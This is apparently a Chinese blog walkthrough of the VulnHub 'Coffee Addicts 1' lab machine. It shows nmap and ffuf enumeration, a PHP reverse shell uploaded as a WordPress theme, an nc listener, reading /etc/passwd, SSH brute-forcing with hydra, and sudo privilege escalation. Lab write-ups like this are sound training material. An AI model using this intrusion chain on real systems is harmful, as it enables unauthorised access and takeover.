VulnHub日记(五):Coffee Addicts 1

靶机介绍

虚拟机链接:https://www.vulnhub.com/entry/coffee-addicts-1,699/

参考博客:https://nepcodex.com/2021/07/coffee-addicts-walkthrough-vulnhub-writeup/

开始练习


本机ip:192.168.56.102

目的机ip:192.168.56.109

nmap  192.168.56.0/24
nmap -A -p-192.168.56.109

开放了22和80端口

访问http,需要添加host,添加完成后进入一个啥用也没有的页面

 使用ffuf枚举目录,发现目录下wordpress文件夹

 

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://coffeeaddicts.thm/FUZZ -D -e .html, .php, .bak,.txt -of html -o dir.html

进一步枚举

 其中有博客页面和管理员登陆页面

 

 找了半天愣是没想到直接在博客里写了自己的密码。。。。

gus:gusineedyouback

 登陆进入管理员页面

想办法弹shell,尝试使用上传模板页面上传反向shell,

下载一个主题文件,

https://wordpress.org/themes/twentytwenty/

将index.php替换为反向shell的php文件,

再打包成zip上传

更换主题

开启监听,访问主页,反弹成功

nc -nvlp 4396

 查看用户所在目录

cat /etc/passwd | grep bash

三个用户,切换到gus在的目录 

cd /home/gus
ls -al
cat user.txt
cat readme.txt

 只能说明被移除了管理员权限,应该是badbyte有root提权的可能,再查看badbyte用户,其中有一个.ssh目录存有一个私钥,没有其他信息,尝试暴力破解,结果密码非常弱,成功了

hydra -l badbyte -P /home/kali/rockyou.txt 192.168.56.109 ssh

连接ssh查看用户权限,查看历史命令

ssh -l badbyte 192.168.56.109
cat .bash_history
sudo -l

 发现可以免root密码执行/opt/BadByte/shell命令,在历史命令里也有所体现,执行后成功提权

sudo /opt/BadByte/shell
whoami

但是发现其实并没有完全成功,想执行一些命令时发现还是没有权限,退出后查看了这个目录,发现还留有源代码,浏览源代码(且这里有点着急了,不应该直接执行未知的文件,应该先做这一步,确认无误后再执行)

 

 发现这里就是在输入的命令后加入空格,然后执行,无限循环,没有什么危害,只需要bash之后打开另一个shell,就可以成功用第一个shell获取的root权限拿FLAG了

bash
cd /root
ls -al
cat root.txt

 

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值